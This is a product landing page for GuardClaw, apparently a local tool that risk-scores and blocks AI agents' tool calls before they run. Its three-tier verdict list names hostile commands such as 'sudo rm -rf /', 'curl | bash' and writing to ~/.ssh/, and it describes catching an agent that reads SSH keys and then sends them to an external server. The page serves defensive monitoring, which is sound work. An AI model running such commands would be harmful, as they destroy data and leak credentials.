Monitoring AI agents in real-time

Security for
AI Agents

Every tool call risk-scored before execution by a local LLM.
Works with OpenClaw, Claude Code, Gemini CLI, and nanobot.
100% private. Zero cloud. Complete visibility.

Get Started View on GitHub
GuardClaw Dashboard — real-time AI agent security monitoring
100%
Local & Private
100%
Benchmark Accuracy
~2s
Per Analysis
$0
Cloud Cost

Built for AI Agent Safety

Monitor, analyze, and optionally block dangerous tool calls — all running locally on your machine.

Real-Time Visibility

See every tool call as it happens — exec, read, write, browser, message — with AI-generated summaries and full details.

LLM-Powered Judgment

A local LLM judge analyzes each command for intent and risk. Understands context, not just pattern matching.

Chain Analysis

Detects multi-step attack patterns. Reading SSH keys then curling an external server? Caught and flagged.

Active Blocking

High-risk commands pause for your approval before executing. One-click approve or deny from your chat.

Completely Private

All analysis runs on local LLMs via LM Studio or Ollama. Your data never leaves your machine. Ever.

Built-in Benchmark

Test any model's security judgment with 30 tool-trace test cases. See accuracy, false positives, and latency.

Adaptive Memory

Learns from your approve/deny decisions. Risk scores adjust automatically, and frequently approved patterns skip the LLM entirely.

Gemini CLI Integration

New provider onboarding and full event integration for Gemini CLI sessions in the same dashboard.

Product Tour

Security Scan, Judge settings, and menu bar monitoring are part of the same workflow.

Security Scan page showing clean scan state

Security Scan

Static audit for MCP config, credentials, and agentic risk patterns.

Judge backend settings with built-in MLX model

Judge Settings

Switch local backends and models, and verify judge runtime status.

Menu bar app with Claude Code tab stats

Menu Bar Monitoring

Track risk counts across Claude Code and OpenClaw without opening a browser.

GuardClaw Essential compact menu bar card

Essential View

Compact status card for connection health and latest high-risk events.

How It Works

GuardClaw sits between your agent and its tools, scoring every action for risk.

1

Agent Acts

Your AI agent calls a tool — exec, write, browser, message, etc.

2

GuardClaw Intercepts

The tool call is captured via WebSocket and sent to your local LLM for analysis.

3

LLM Judges

Risk score (1–10), verdict (SAFE/WARNING/BLOCK), and reasoning — all in ~2 seconds.

4

You Decide

Safe tools run freely. Dangerous tools pause for your approval. Everything is logged.

Three-Tier Verdict System

Every tool call is classified into one of three risk tiers with 100% accuracy on our benchmark.

SAFE

Score 1–3 · Runs freely

Read-only operations, local builds, version control

catgrepgit commitnpm build

WARNING

Score 4–7 · Logged for review

Potentially impactful but common operations

killrm -rf node_moduleschmodcurl POST

BLOCK

Score 8–10 · Requires approval

Dangerous, destructive, or exfiltration attempts

sudo rm -rf /curl | bashwrite ~/.ssh/

🔌 Works with Claude Code

GuardClaw integrates directly with Claude Code via HTTP hooks — no OpenClaw required. Every Bash, Read, Write, and Edit command is risk-scored before execution.

  • Pre-execution blocking — dangerous commands pause in Claude Code's terminal
  • Dashboard approval — approve or deny from the GuardClaw UI
  • Dedicated tab — Claude Code sessions shown separately with full conversation context
  • One-line install — node scripts/install-claude-code.js
  • Works alongside OpenClaw — monitor both platforms from one dashboard
# Install Claude Code hooks node scripts/install-claude-code.js # Start GuardClaw guardclaw start # Done! Every Claude Code tool # call is now monitored.

Quick Start

Start GuardClaw, then complete onboarding in the dashboard: Judge → Connections → Security Check → Protection.

# Install and start GuardClaw git clone https://github.com/TobyGE/GuardClaw.git cd GuardClaw nvm use # Node 22.x npm ci && npm ci --prefix client && npm run verify:native && npm run build npm link guardclaw start # → opens localhost:3002

Onboarding Flow (Recommended)

  • 1 Judge: pick Built-in MLX, LM Studio, or Ollama and activate a model
  • 2 Connections: install hooks/plugin for Claude Code, Gemini CLI, or OpenClaw
  • 3 Security Check: run the initial scan for skills, hooks, MCP servers, and plugins
  • 4 Protection: choose Strict (recommended), Balanced, or Monitor mode

Strict enables fail-closed by default, so risky calls stop if GuardClaw or the local judge is unavailable.

After installing hooks/plugin, restart the corresponding client to activate interception.

Prerequisites

Recommended Models

Works with any model loaded in LM Studio or Ollama. These are tested and optimized.

qwen/qwen3-4b Recommended

Default model. 100% accuracy on 30-case benchmark. Fast (~2s/call), small footprint (~3GB). Best balance of speed and accuracy.

openai/gpt-oss-20b Alternative

98% accuracy with richer reasoning output. Slower but provides more detailed risk explanations. Good for auditing.

Monitor Only — or Full Protection

By default, GuardClaw watches and scores without interfering. Install the plugin to upgrade to active blocking.

  • Pre-execution interception — dangerous tools are paused, not just logged
  • Approval workflow — /approve-last or /deny-last from your chat
  • Auto-retry — approved commands re-execute automatically
  • Fail-closed mode — tools blocked when GuardClaw is offline
  • One-click toggle — switch between monitor and blocking from the dashboard
# Install the blocking plugin guardclaw plugin install openclaw gateway restart # That's it! Toggle blocking # from the 🛡️ button in # the dashboard header.

Start Protecting Your Agents

Open source. Runs locally. Takes 60 seconds to set up.

Get GuardClaw → Read the Docs

💬 Found a bug, got a feature idea, or stuck on setup?
Open a GitHub issue — every piece of feedback shapes the next release.